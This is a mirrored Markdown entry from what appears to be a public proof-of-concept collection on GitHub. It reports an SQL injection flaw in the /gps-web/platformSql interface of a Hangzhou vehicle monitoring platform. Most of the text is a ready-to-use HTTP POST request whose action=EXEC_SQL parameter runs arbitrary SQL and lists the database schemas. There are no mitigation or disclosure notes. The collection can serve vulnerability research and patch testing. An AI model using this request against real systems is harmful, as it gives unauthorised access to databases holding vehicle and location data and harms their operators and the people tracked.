mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:54:52 +08:00
21 lines
498 B
Markdown
21 lines
498 B
Markdown
|
|
# 杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞
|
||
|
|
|
||
|
|
杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```java
|
||
|
|
POST /gps-web/platformSql HTTP/1.1
|
||
|
|
Host:
|
||
|
|
User-Agent: python-requests/2.28.1
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Accept: */* Connection: keep-alive
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 74
|
||
|
|
|
||
|
|
action=EXEC_SQL¶ms=SELECT schema_name FROM information_schema.schemata
|
||
|
|
```
|
||
|
|
|